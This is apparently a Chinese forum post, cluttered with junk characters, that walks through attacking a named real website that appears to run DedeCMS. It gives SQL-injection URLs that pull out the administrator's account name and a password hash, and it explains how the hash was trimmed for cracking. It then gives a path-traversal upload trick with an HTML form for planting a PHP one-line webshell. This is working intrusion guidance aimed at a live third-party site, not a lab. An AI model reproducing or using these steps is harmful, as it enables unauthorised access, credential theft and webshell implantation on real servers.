①注入漏洞。
5 ~9 h1 a9 b4 V这站 http://www.political-security.com/' N* x1 w( ^$ p1 Z' X: o( I) j
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,# j' f" d( d; j2 V, q6 X7 G; E
www.political-security.com/data/mysql_error_trace.inc 爆后台5 Z% m4 z v% R# N! m. X6 ^# D
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。9 a1 T% B4 N- |( p! M0 g3 F& d& P
然后写上语句 5 W d/ N8 X7 s( J2 B4 H$ \1 Y& x
查看管理员帐号
1 C6 |1 d& f( @1 \# U# C& o+ ihttp://www.political-security.co ... &membergroup=@`
9 z0 F) c* |5 c* R {: ~9 d
1 k! q, E* c8 X7 i- q) t4 V$ d1 Fadmin + Y# Y4 _! n. |. B- R/ ?) B$ F, |
$ t8 ]( |( }" K* o* J
查看管理员密码
/ H; S2 Q9 x# ~' c: l/ k http://www.political-security.co ... &membergroup=@`; P9 C; |0 I9 Y, Q
, Q1 @7 V7 h [ j8d29b1ef9f8c5a5af429
7 S, F. y; p# A( C3 P# i9 Z7 Q8 C
查看管理员密码
* n0 ^7 X1 L$ C5 s( O; d; T X/ w' Z5 t) ^3 W' k+ \( V
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5, U, T" H( e( e8 A
; u `! b: x; O7 A( e% J; J
8d2
. D/ V- c- @6 _- t1 h7 r( g9b1ef9f8c5a5af42
$ l7 W7 z) ~( v; V U! }0 m9( A# ~7 f( C C- J1 B! D
: w$ C# n4 j$ gcmd5没解出来 只好测试第二个方法$ N& W2 ^' ]+ t# O
8 V6 }2 K$ \7 d" c+ T
8 g) g0 y* D7 b# I; A②上传漏洞:1 m! r. {( |, l5 C0 b- @
/ v2 h* `* K& }
只要登陆会员中心,然后访问页面链接
6 ~! _2 R. t7 @' M& A“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”3 o @3 C6 {/ L; R& q& k
4 n, a( `; ?. g& J5 u$ k# R如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
+ N2 @6 _, C* O0 B6 D/ P) X( T+ S" ^7 ?4 Z
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm/ `; y9 ^* R2 A& P3 B2 T
' w2 z' u' D6 o<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br> J4 R: S3 ?9 d8 ^8 m; l
或者
7 U+ F, m0 g) \& s即可上传成功 |